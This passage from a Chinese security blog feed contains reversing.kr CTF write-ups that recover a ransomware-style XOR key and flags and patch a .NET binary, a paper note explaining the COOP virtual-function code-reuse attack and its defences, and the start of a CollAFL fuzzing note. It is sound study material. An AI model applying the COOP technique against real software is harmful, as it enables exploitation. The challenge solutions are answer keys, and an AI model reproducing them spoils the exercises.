class="string">&quot;./run_dump_patch.exe&quot;</span>, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(new_data)</span><br></pre></td></tr></table></figure><p>而且在 <code>sub_401000</code> 函数中，整个函数体全部充斥着这类指令，即该函数是一个空函数体。为了防止混淆，我们将 <code>sub_401000</code> 函数名称修改为 <code>nop_func</code>。</p><p>接着非常悲剧的发现，main 函数还是因为函数太大无法被反汇编…</p><p>莫得办法了，只能将函数头的</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">UPX0:</span>004135E0 <span class="number">55</span>                                      <span class="keyword">push</span>    <span class="built_in">ebp</span></span><br><span class="line"><span class="symbol">UPX0:</span>004135E1 8B EC                                   <span class="keyword">mov</span>     <span class="built_in">ebp</span>, <span class="built_in">esp</span></span><br><span class="line"><span class="symbol">UPX0:</span>004135E3 <span class="number">83</span> EC <span class="number">24</span>                                <span class="keyword">sub</span>     <span class="built_in">esp</span>, <span class="number">24h</span></span><br><span class="line"><span class="symbol">UPX0:</span>004135E6 <span class="number">53</span>                                      <span class="keyword">push</span>    <span class="built_in">ebx</span></span><br><span class="line"><span class="symbol">UPX0:</span>004135E7 <span class="number">56</span>                                      <span class="keyword">push</span>    <span class="built_in">esi</span></span><br><span class="line"><span class="symbol">UPX0:</span>004135E8 <span class="number">57</span>                                      <span class="keyword">push</span>    <span class="built_in">edi</span></span><br></pre></td></tr></table></figure><p>移动到末尾：</p><p><img src="/2021/12/reversing_kr-1/image-20211212154417401.png" alt="image-20211212154417401"></p><p>然后修改一下函数的起始位置：</p><p><img src="/2021/12/reversing_kr-1/image-20211212154503604.png" alt="image-20211212154503604"></p><p>之后就可以照常反编译了，以下是经过简化的反汇编代码。</p><blockquote><p>不过需要注意的是，这里修改函数的起始地址，指的是<strong>IDA 静态分析</strong>的起始地址。实际上函数调用 main 时仍然会跳转回原先的地址。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  [...]</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Key : &quot;</span>);</span><br><span class="line">  <span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>, key);</span><br><span class="line">  v3 = <span class="built_in">strlen</span>(key);</span><br><span class="line">  v7 = <span class="number">0</span>;</span><br><span class="line">  Stream = <span class="built_in">fopen</span>(<span class="string">&quot;file&quot;</span>, <span class="string">&quot;rb&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span> (!Stream)</span><br><span class="line">      ;<span class="comment">/* exit */</span></span><br><span class="line">  <span class="built_in">fseek</span>(Stream, <span class="number">0</span>, <span class="number">2</span>);</span><br><span class="line">  v6 = <span class="built_in">ftell</span>(Stream);    <span class="comment">// 获取文件长度</span></span><br><span class="line">  <span class="built_in">rewind</span>(Stream);</span><br><span class="line">  <span class="keyword">while</span> (!<span class="built_in">feof</span>(Stream))  <span class="comment">// 将文件数据读入 buf</span></span><br><span class="line">  &#123;</span><br><span class="line">    buf[v7] = <span class="built_in">fgetc</span>(Stream);</span><br><span class="line">    ++v7;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; v6; ++i ) <span class="comment">// 尝试加密</span></span><br><span class="line">  &#123;</span><br><span class="line">    buf[i] ^= key[i % v3];</span><br><span class="line">    buf[i] = ~buf[i];</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">fclose</span>(Stream);</span><br><span class="line">  v5 = <span class="built_in">fopen</span>(<span class="string">&quot;file&quot;</span>, <span class="string">&quot;wb&quot;</span>);</span><br><span class="line">  <span class="keyword">for</span> ( j = <span class="number">0</span>; j &lt; v6; ++j )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">fputc</span>(buf[j], v5);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">printf</span>(asc_44C<span class="number">1E8</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">getch</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>最核心的就是这部分加密算法：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v6 为文件数据长度</span></span><br><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; v6; ++i ) <span class="comment">// 尝试加密</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// v3 为 key 长度</span></span><br><span class="line">    buf[i] ^= key[i % v3];</span><br><span class="line">    buf[i] = ~buf[i];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而 readme.txt 的描述是这样的：<code>Decrypt File (EXE)</code>。也就是说那个 file 文件实际上就是加密后的 exe 文件。</p><p><strong>在已有明文、密文并了解加密算法</strong>的情况下，我们便可以很容易的将密钥解出来。需要注意的是这里选取的是两个 exe 文件（一个加密前一个加密后）的<strong>前30 字节</strong>，因为应该所有 exe 文件的前30个字节都相同。</p><p>以下是暴力枚举密钥的算法：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#include &lt;iostream&gt;</span></span><br><span class="line">using namespace std;</span><br><span class="line"></span><br><span class="line"><span class="built_in">int</span> main() &#123;</span><br><span class="line">    // hexdump -n <span class="number">30</span> run.exe.bak -e <span class="string">&#x27;30/1 &quot;\\x%x&quot;&#x27;</span></span><br><span class="line">    const char* origin_text = <span class="string">&quot;\x4d\x5a\x90\x0\x3\x0\x0\x0\x4\x0\x0\x0\xff\xff\x0\x0\xb8\x0\x0\x0\x0\x0\x0\x0\x40\x0\x0\x0\x0\x0&quot;</span>;</span><br><span class="line">    // hexdump -n <span class="number">30</span> file -e <span class="string">&#x27;30/1 &quot;\\x%x&quot;&#x27;</span></span><br><span class="line">    const char* cipher_text = <span class="string">&quot;\xde\xc0\x1b\x8c\x8c\x93\x9e\x86\x98\x97\x9a\x8c\x73\x6c\x9a\x8b\x34\x8f\x93\x9e\x86\x9c\x97\x9a\xcc\x8c\x93\x9a\x8b\x8c&quot;</span>;</span><br><span class="line">    <span class="keyword">for</span> (size_t i = <span class="number">0</span>; i &lt; strlen(cipher_text); i++) &#123;</span><br><span class="line">        <span class="built_in">int</span> key;</span><br><span class="line">        <span class="keyword">for</span> (key = <span class="number">0</span>; key &lt; <span class="number">255</span>; key++) &#123;</span><br><span class="line">            <span class="keyword">if</span> ((origin_text[i] ^ key) == (~cipher_text[i])) &#123;</span><br><span class="line">                cout &lt;&lt; (char)key;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (key == <span class="number">0xff</span>)</span><br><span class="line">            abort();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>输出密钥为 <code>letsplaychess</code>：</p><p><img src="/2021/12/reversing_kr-1/image-20211212164923948.png" alt="image-20211212164923948"></p><p>因此再解密一下 file 文件：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _CRT_SECURE_NO_WARNINGS</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    FILE* cipher_file = <span class="built_in">fopen</span>(<span class="string">&quot;C:\\Users\\Kiprey\\Desktop\\rever\\ransomware\\file&quot;</span>, <span class="string">&quot;rb&quot;</span>);</span><br><span class="line">    FILE* output_file = <span class="built_in">fopen</span>(<span class="string">&quot;C:\\Users\\Kiprey\\Desktop\\rever\\ransomware\\flag.exe&quot;</span>, <span class="string">&quot;wb&quot;</span>);</span><br><span class="line">       </span><br><span class="line">    <span class="type">const</span> <span class="type">char</span>* key = <span class="string">&quot;letsplaychess&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">fseek</span>(cipher_file, <span class="number">0</span>, SEEK_END);</span><br><span class="line">    <span class="type">size_t</span> cipher_len = <span class="built_in">ftell</span>(cipher_file);    <span class="comment">// 获取文件长度</span></span><br><span class="line">    <span class="built_in">rewind</span>(cipher_file);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; cipher_len; ++i) <span class="comment">// 尝试加密</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">char</span> buf = <span class="built_in">fgetc</span>(cipher_file);</span><br><span class="line">        buf = ~buf;</span><br><span class="line">        buf ^= key[i % <span class="built_in">strlen</span>(key)];</span><br><span class="line">        <span class="built_in">fputc</span>(buf, output_file);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">fclose</span>(cipher_file);</span><br><span class="line">    <span class="built_in">fclose</span>(output_file);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>解出一个 <code>flag.exe</code>，运行下看看：</p><p><img src="/2021/12/reversing_kr-1/image-20211212165915247.png" alt="image-20211212165915247"></p><p>晕，从别处拷了一些 DLL 过来，终于解出来了…</p><p><img src="/2021/12/reversing_kr-1/image-20211212170048738.png" alt="image-20211212170048738"></p><p>flag为 <code>Colle System</code>。</p><h2 id="7-CSHOP">7. CSHOP</h2><p>程序打开后没有任何可交互部分。拖进 IDA 发现是个 <code>.NET</code> 程序，直接用 dnSpy x86 打开（不得不说 dnSpy 的界面是真的好看）：</p><p><img src="/2021/12/reversing_kr-1/image-20211212173934346.png" alt="image-20211212173934346"></p><p>简单通读了一下代码，该窗口有 10 个 Label 和 1 个 Button，当 Button 被按下后，这10个 label 将显示出对应的文字（应该是 flag）。但问题是， <strong>Button 的 size 为 (0,0)</strong>，因此正常情况下我们无法点击该 Button。</p><p>不过我们可以尝试修改这个 IL：</p><p><img src="/2021/12/reversing_kr-1/image-20211212174305594.png" alt="image-20211212174305594"></p><p>这两个值改大一点，然后 <code>File -&gt; Save Module</code>：</p><p><img src="/2021/12/reversing_kr-1/image-20211212174327671.png" alt="image-20211212174327671"></p><p>重新打开被 patch 后的程序，并点击按钮，即可出现 flag：</p><p><img src="/2021/12/reversing_kr-1/image-20211212175001051.png" alt="image-20211212175001051"></p><p>flag 为 <code>P4W6RP6SES</code>。</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;0-简介&quot;&gt;0. 简介&lt;/h2&gt;
&lt;p&gt;这里将记录一些笔者学习 &lt;a href=&quot;http://reversing.kr&quot;&gt;reversing.kr&lt;/a&gt; 中的逆向题所留下的笔记。&lt;/p&gt;
&lt;p&gt;这篇笔记所记录的题目分值为 100-120。&lt;/p&gt;</summary>
    
    
    
    
    <category term="reverse" scheme="https://kiprey.github.io/tags/reverse/"/>
    
  </entry>
  
  <entry>
    <title>《Counterfeit Object-oriented Programming》 论文笔记</title>
    <link href="https://kiprey.github.io/2021/12/coop/"/>
    <id>https://kiprey.github.io/2021/12/coop/</id>
    <published>2021-12-01T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.900Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>现阶段，ROP (面向返回的编程技术) 已经成为了一种非常流行的利用手法，同时现在也存在各种方式来保护程序免受 ROP 工具，例如 shadow stack 技术。而这篇 2015 年的论文向我们展示了一种新的利用手法，称为<strong>面向伪对象编程（COOP）</strong>，即只通过程序中现有虚函数链以及 callsite 来进行恶意攻击。该攻击方式是<strong>图灵完备</strong>的，即可以执行任何操作，包括条件分支等。</p><p>同时，COOP 技术也可以绕过那些 <strong>不精确考虑C++面向对象语义</strong> 的防御手段。它并不针对与某一类语言（例如 C++），因此自然无法防护 COOP 技术。</p><p>该攻击手法基于 C++ 虚函数的一些特性：</p><ul><li><p>C++ 编译器通过 <strong>vtable 虚函数表</strong>来实现对 <strong>vcall 虚函数</strong> 的访问</p><blockquote><p>其中 vtable 是指向类的所有可能继承继承的虚函数的指针数组。</p><p>根据逆向结果来看， vtable 通常位于 .rodata 段上。</p></blockquote></li><li><p>对于包含虚函数的类来说，其对象内存开始处（即偏移量为0）包含一个指向 vtable 的指针。</p></li></ul><span id="more"></span><h2 id="二、面向伪对象的编程">二、面向伪对象的编程</h2><h3 id="1-目标">1. 目标</h3><p>对于常规代码重用攻击，例如 ROP，其攻击手法包含一项或多项特性：</p><ul><li><p>C-1：间接调用或跳转至<strong>非 address-taken</strong> 的位置。</p><blockquote><p>非 address-taken位置，个人认为应该是那些<strong>不使用函数指针而执行到</strong>的代码位置，例如各类 gadgets。</p><p>即虚函数是 address-taken 的。</p></blockquote></li><li><p>C-2：从函数返回时，不符合调用堆栈</p></li><li><p>C-3：过度使用间接分支</p></li><li><p>C-4：劫持堆栈指针</p></li><li><p>C-5：注入新代码或者操作现有代码</p></li></ul><p>由于常规的攻击包含了这些特性，因此这类攻击，将会被那些低级且与语言无关的保护手法所检测出。</p><p>故 COOP 所定义的目标如下所示：</p><ul><li>G-1：不得暴露特性 C-1 至 C-5</li><li>G-2：务必展示出<strong>类似于正常 C++ 代码执行</strong>的控制流和数据流</li><li>G-3：广泛应用于 C++ 应用</li><li>G-4：实现图灵完备</li></ul><h3 id="2-敌手模型">2. 敌手模型</h3><p>COOP 攻击的实施，要求攻击者</p><ul><li>可以劫持一个 <strong>使用 vptr 的 C++ 对象</strong>（即劫持一个存在虚函数的对象），并能推断出该对象的基地址，或者可以控制足够大小的缓冲区。</li><li>能推断出一组 C++ 模块的基地址，并且了解该模块的二进制布局。</li></ul><h3 id="3-基本攻击方法">3. 基本攻击方法</h3><p>在说明攻击方法之前，先给出以下几个定义</p><ul><li><p>initial object （下称<strong>初始对象</strong>）：目标程序中被劫持的 C++ 对象，一切攻击从这里开始。</p></li><li><p>counterfeit objects（下称<strong>伪造对象</strong>）： 携带攻击者<strong>所选择的 vptr</strong> 和一些<strong>精心构建的数据字段</strong>，并被攻击者批量注入进可控内存中。正如名字所示，这个“对象“是攻击者手动伪造的。</p></li><li><p>Vfgadgets：COOP 攻击中将会使用到的<strong>虚函数</strong>。vfgadgets 的类型如下表所示：</p><p><img src="/2021/12/coop/image-20211202111754544.png" alt="image-20211202111754544"></p></li></ul><p>大体的定义已经在上面给出，接下来将详细说明攻击方式：</p><ol><li><p>首先，为了重复调用虚函数，COOP 攻击需要<strong>依赖 ML-G 类型的 vfgadget</strong>（即上面列表中的第一个条目）</p><blockquote><p>ML-G：可以理解成攻击的事件循环。它将遍历一个<strong>指向伪造对象的指针数组</strong>，并依次调用其中的<strong>虚函数</strong>。</p><p>这类 vfgadgets 在 C++ 应用程序中非常常见。</p></blockquote><p>如该图所示，图中的 <code>Course::~Course</code> 虚函数，即为ML-G 类型的 vfgadget。</p><p><img src="/2021/12/coop/image-20211202161904967.png" alt="image-20211202161904967"></p></li><li><p>接下来，攻击者将<strong>初始对象</strong>的内存，<strong>布局为类似 ML-G 的类的对象</strong>（例子中的目标对象为 Course）。</p><p>其中，初始对象中的 vptr，被攻击者修改为 Course 类的原始 vptr 相对偏移一点的地址。这是为了使得初始对象<strong>接下来的第一个虚函数调用</strong>，可以调用至<strong>目标的虚函数</strong>（即可调用至 ML-G vfgadgets）。</p><blockquote><p>注意，图中左边那块内存，是<strong>攻击者完全可控</strong>的。即攻击者在可控的内存内<strong>构建了一个完整的 Course 类对象</strong>，包括其内部成员的指针数组。</p><p>同时，字段 stutdents 指针数组所指向的各个 object，即为<strong>伪造对象</strong>，其 vptr 均可控。</p><p>还需要注意的是，由于伪造对象是攻击者自己伪造的，因此实际上伪造对象<strong>可以不是同一种类型</strong>，例如一种伪造对象是 string 类型，另一种伪造对象是 Student 类型。</p></blockquote><p><img src="/2021/12/coop/image-20211202162256571.png" alt="image-20211202162256571"></p></li><li><p>修改<strong>伪造对象的 vptr</strong>。由于伪造对象在被 ML-G 调用时，其调用目标可能不是攻击者所期望的 vfgadgets（例如Fig 1 中调用的是 <strong>Student::decCourseCount</strong> 函数），因此攻击者需要<strong>修改伪造对象的 vptr 指针</strong>，使得<strong>当伪造对象在虚函数调用点被调用时，可以调用到目标 vfgadget</strong>。</p><p>这里的修改可以从原先的 vtable 地址（例如 Student 的 vtable 地址）相对的前后偏移一点位置，使得此时的 vptr 指针指向了原先 vtable 地址向后一点的函数位置。</p><p>当上述三个步骤完成后，我们便可以通过<strong>操纵 伪造对象的 vptr</strong>，搭配 ML-G 类型的 vfgadget，来进行<strong>任意数量的 vfgadgets 调用</strong>。</p><p><img src="/2021/12/coop/image-20211202164733622.png" alt="image-20211202164733622"></p></li><li><p><strong>覆盖</strong>伪造对象。先上两张图，首先是给出的两个目标类的内存布局以及其目的 vfgadgets：</p><p><img src="/2021/12/coop/image-20211202165553242.png" alt="image-20211202165553242"></p><p>这里会用到两个 vfgadgets，分别是：</p><ul><li>Exam 类中的 ARITH-G（算数或逻辑操作）：注意到该函数会将三个成员变量的和，<strong>写入至当前类对象中的另一个字段</strong>。</li><li>SimpleString 类中的 W-G（写入数据至目标地址）：注意到该函数会<strong>使用当前类对象的某个字段</strong>，作为复制操作的 length。</li></ul><p>注意到上面标注的粗体内容，一个是写入数据，一个是读取数据。因此攻击者可以<strong>精心将两个对象的内存重叠</strong>，使得 <strong>W-G 中使用的 length 刚好是 ARITH-G 所计算出的结果</strong>，这样就可以造成越界写入。<br>以下是构建的内存布局，注意 ARITH-G gadget <strong>会把计算出的结果写入至 SimpleString 类型的 len 字段中</strong>：</p><p><img src="/2021/12/coop/image-20211202170110810.png" alt="image-20211202170110810"></p><blockquote><p>此时可能会有疑问，这里的 SimpleString 和 Exam 类会在哪里被使用呢？</p><p>实际上，攻击者将会精心构建这两个类的类对象，以作为 ML-G 类中的 <strong>伪造对象</strong>，被 ML-G vfgadget 调用其虚函数。</p></blockquote></li></ol><p>综上，基本的攻击方法如上所示。其攻击过程可以看成 <strong>单个 vcall -&gt; 多个 vcall -&gt; OOB</strong>。需要注意的是，基本攻击手法<strong>没能传递任何参数</strong>给<strong>vfgadget</strong>。</p><h3 id="4-vfgadget-参数传递">4. vfgadget 参数传递</h3><blockquote><p>参数传递的方式，取决于函数调用约定。</p></blockquote><h4 id="a-通过多个寄存器传递调用参数">a. 通过多个寄存器传递调用参数</h4><ol><li>首先，挑选一个合适的 vfgadget 并执行，以便于将<strong>伪造的字段</strong>分别写入至<strong>函数调用参数传递寄存器</strong>。</li><li>执行目标 vfgadget，其参数使用上一个 vfgadget 刚刚伪造的值。</li></ol><blockquote><p>该操作要求 <strong>ML-G 不修改参数传递寄存器</strong>（包括不能传递参数给 vfgadget）。</p></blockquote><h4 id="b-通过单个寄存器-栈传递调用参数">b. 通过单个寄存器 + 栈传递调用参数</h4><blockquote><p>例如 thiscall 调用约定，this 指针通过 ecx 寄存器传递，其他参数通过栈传递。</p></blockquote><p>该情况的参数传递依赖于 ML-G 主循环。ML-G 应该将<strong>初始对象</strong>的某个字段作为参数（<strong>将传递参数的 ML-G 称为 ML-ARG-G</strong>）传入给每个 vfgadget。之后，攻击者可以使用以下方法来将目的参数传递给目标 vfgadget:</p><ol><li><p>传递的参数是一个<strong>指针</strong>，指向一个临时可写内存。这样 vfgadgets 可以通过读写这块内存来传递参数，例如以下示例：</p><p><img src="/2021/12/coop/image-20211202205055482.png" alt="image-20211202205055482"></p><p>图中 ML-G <code>Course2::~Course2</code> vfgadget 传递了一个参数<code>id</code> 给其他 vfgadget。而在<code>Student2::getLatestExam</code> 方法中，实际上将参数视为一个指针，因为<strong>引用的本质是指针</strong>。在该函数中，控制流动态的修改了参数所指向的内存。这样当下一个 vfgadget 获取到参数后，它便能<strong>读取上一个 vfgadget 所保留的信息</strong>。</p></li><li><p>动态重写参数。论文里说明该方法允许攻击者<strong>将任意参数传递给 vfgadgets</strong>，但该方法<strong>需要一个可用的 W-G 类型的 vfgadget。</strong></p><blockquote><p>该方法暂时存疑，因为私以为该方法和第一个方法有异曲同工之处。</p><p>参数传递正常来说是按值传递，因此按理来说重写本地参数副本将无法影响到其他 vfgadgets 所获取到的参数值。</p></blockquote><p>而在这类 vfgadget 中，单独使用某个字段的较为少见，因此参数传递大多还是使用第一个方法。</p></li></ol><h4 id="c-传递多个参数">c. 传递多个参数</h4><p>先上张图：</p><p><img src="/2021/12/coop/image-20211202210233297.png" alt="image-20211202210233297"></p><ul><li>若调用的 vfgadget 实际使用的参数个数比 ML-ARG-G 传递的要<strong>少</strong>时，新传递的参数将被永久压栈（因为不使用参数的 vfgadget 将不会清理栈）。多调用几次（即多压几次栈），那么栈内存上就有构建好的一组参数值。</li><li>而若调用的 vfgadget 实际使用的参数个数比 ML-ARG-G 传递的要<strong>多</strong>时，在 vfgadget 函数返回时，该函数将额外弹出”参数“的栈空间，即向下恢复栈。</li></ul><h3 id="5-API-函数的调用">5. API 函数的调用</h3><p>COOP 攻击可以使用以下三种方法尝试调用 WinAPI 函数：</p><ol><li><p>使用一个正常调用 WinAPI 的 vfgadget。</p><p>缺点：大多情况下不可行。</p></li><li><p>在 ML-G 中像调用 vfgadget 一样调用 WinAPI。</p><p>优点：易于实现。例如让 vptr 指向诸如 GOT、IAT、EAT 等表。</p><p>缺点：</p><ol><li>违反目标G-2，没能展示出<strong>类似于正常 C++ 代码执行</strong>的控制流和数据流</li><li>受限于调用约定，伪造对象的指针总是以第一个参数传递给 WinAPI。</li><li>使用一个<strong>调用 C 风格函数指针</strong>的 vfgagdet。该方法需要使用一种特殊 vfgadget：INV-G。例如下图中的 vfgadget：</li></ol><p><img src="/2021/12/coop/image-20211202211308760.png" alt="image-20211202211308760"></p></li></ol><h3 id="6-实现分支和跳转">6. 实现分支和跳转</h3><p>COOP 攻击是图灵完备的，因此这里需要说明一下 COOP 攻击如何实现分支和跳转功能。</p><p>注意到 ML-G 使用<strong>索引</strong>来遍历伪造对象。（例如 for 循环上的 int 类型索引，或者容器迭代器）。</p><p>COOP 攻击可以通过使用 W-COND-G vfgadget 来在满足某些条件的情况下，<strong>重写 ML-G 的索引</strong>，或者<strong>修改下一个待遍历的伪对象的指针</strong>。</p><p>这种重写需要知道对应变量的地址，若索引存放在栈上，则可以通过上面的压栈和弹栈来<strong>移动栈指针</strong>，达到<strong>修改目标地址上索引</strong>的目的。</p><p><img src="/2021/12/coop/image-20211202215512956.png" alt="image-20211202215512956"></p><h2 id="三、防护手法">三、防护手法</h2><p>以下几种方式可以防止或缓解 COOP 攻击：</p><ul><li><p>通用防护技术</p><ol><li>限制合法API的 callsite。但可能较难精确识别给定 API 函数模块的合法 callsite，而且即便限制 API 调用，COOP 仍然可以泄露一些敏感数据。</li><li>监视栈指针是否发生异常。例如在 32 位下 COOP 准备参数期间，栈指针将异常抬高，但这类检测在 cdel 调用约定中，较难将恶意行为和正常行为区分开。</li></ol></li><li><p>C++语义敏感技术</p><ol><li>验证 vptr 是否指向合法的 vtable。缺点是开销可能较大。</li><li>监视数据流。开销可能也比较大。</li><li>C++ 数据结构的细粒度随机化。例如在 C++ 对象内部字段间插入随机大小的填充，或者对 vtable 位置和结构进行细粒度随机化。</li></ol></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;现阶段，ROP (面向返回的编程技术) 已经成为了一种非常流行的利用手法，同时现在也存在各种方式来保护程序免受 ROP 工具，例如 shadow stack 技术。而这篇 2015 年的论文向我们展示了一种新的利用手法，称为&lt;strong&gt;面向伪对象编程（COOP）&lt;/strong&gt;，即只通过程序中现有虚函数链以及 callsite 来进行恶意攻击。该攻击方式是&lt;strong&gt;图灵完备&lt;/strong&gt;的，即可以执行任何操作，包括条件分支等。&lt;/p&gt;
&lt;p&gt;同时，COOP 技术也可以绕过那些 &lt;strong&gt;不精确考虑C++面向对象语义&lt;/strong&gt; 的防御手段。它并不针对与某一类语言（例如 C++），因此自然无法防护 COOP 技术。&lt;/p&gt;
&lt;p&gt;该攻击手法基于 C++ 虚函数的一些特性：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;C++ 编译器通过 &lt;strong&gt;vtable 虚函数表&lt;/strong&gt;来实现对 &lt;strong&gt;vcall 虚函数&lt;/strong&gt; 的访问&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;其中 vtable 是指向类的所有可能继承继承的虚函数的指针数组。&lt;/p&gt;
&lt;p&gt;根据逆向结果来看， vtable 通常位于 .rodata 段上。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;对于包含虚函数的类来说，其对象内存开始处（即偏移量为0）包含一个指向 vtable 的指针。&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="virtual call" scheme="https://kiprey.github.io/tags/virtual-call/"/>
    
  </entry>
  
  <entry>
    <title>《CollAFL - Path Sensitive Fuzzing》论文笔记</title>
    <link href="https://kiprey.github.io/2021/11/collafl/"/>
    <id>https://kiprey.github.io/2021/11/collafl/</id>
    <published>2021-11-30T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.893Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>现有 fuzz 大多以代码覆盖率为引导指标。以AFL为例，它使用<strong>映射至 hashmap 中的基于 edge 的覆盖率信息</strong>来引导测试。这种覆盖率信息不太准确，因为<strong>只统计至 edge 层面</strong>，同时还会<strong>产生覆盖 hash 冲突</strong>，丢失覆盖率信息，给模糊测试带来一些不良限制。</p><p>这篇论文提出了一个新的方式，来达到以下三个目的：</p><ul><li>提供<strong>更准确的覆盖信息</strong></li><li><strong>缓解</strong>路径冲突</li><li>保持<strong>较低检测开销</strong></li></ul><p>同时，该论文还利用覆盖率信息，提出了<strong>三种新的模糊测试策略</strong>，加快了发现新路径和漏洞的速度。</p><p>下图是一个完整 fuzz 的工作流程，其中黄色标注部分为论文所提出的<strong>重点思路</strong>：</p><p><img src="/2021/11/collafl/image-20211201164140587.png" alt="image-20211201164140587"></p><span id="more"></span><h2 id="二、降低哈希碰撞策略">二、降低哈希碰撞策略</h2><h3 id="1-覆盖粒度">1. 覆盖粒度</h3><p>覆盖粒度大体上可分为三类：</p><ul><li>block coverage，块覆盖</li><li>edge coverage，边覆盖</li><li>path 